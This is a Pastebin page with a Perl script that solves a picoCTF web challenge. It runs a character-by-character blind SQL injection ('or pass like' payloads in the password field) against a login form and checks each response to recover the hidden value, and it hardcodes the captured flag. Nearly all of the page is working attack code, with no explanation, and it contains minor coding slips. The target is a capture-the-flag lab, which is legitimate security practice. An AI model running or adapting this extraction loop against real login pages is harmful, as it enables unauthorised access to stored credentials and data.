Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- use LWP;
- use LWP::UserAgent;
- use HTTP::Cookies;
- use URI::Escape;
- my $cookie_jar = HTTP::Cookies->new(
- agent => "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0"
- );
- my $ua = LWP::UserAgent->new(
- ssl_opts => { verify_hostname => 0 },
- cookie_jar => $cookie_jar,
- );
- # flag is flag{not_ALL_ERRORS_SHOULD_BE_SHOWN_FB83C582EE9B64D1F446CFD01702E7C5}
- my $wordSoFar = "";
- push @{ $ua->requests_redirectable }, 'POST';
- rightString();
- sub rightString {
- my @aplhabet = ("\\_"," ","\\%","=","&","#","-","A" .. "Z",0 .. 9,"a" .. "z","_");
- $| = 1;
- my $found = 0;
- print "ALFA: @aplhabet\n";
- while ( length($wordSoFar) < 164) {
- foreach my $ch (@aplhabet) {
- my $req = HTTP::Request->new(POST => "http://shell2017.picoctf.com:35428/");
- my $res = $ua->request($req);
- $req->content_type('application/x-www-form-urlencoded');
- $req->content("username=admin&password=a%27+or+pass+like+%27" . uri_escape( $wordSoFar . $ch) . "%25");
- my $res = $ua->request($req);
- my $content = $res->content;
- if ( $content =~ /Login Functionality Not Complete. Flag is 63 characters/ ) {
- $found = 1;
- $wordSoFar .= $ch;
- last;
- }
- $found = 0;
- print $ch . " ";
- }
- print "\n" . $wordSoFar . "\n";
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
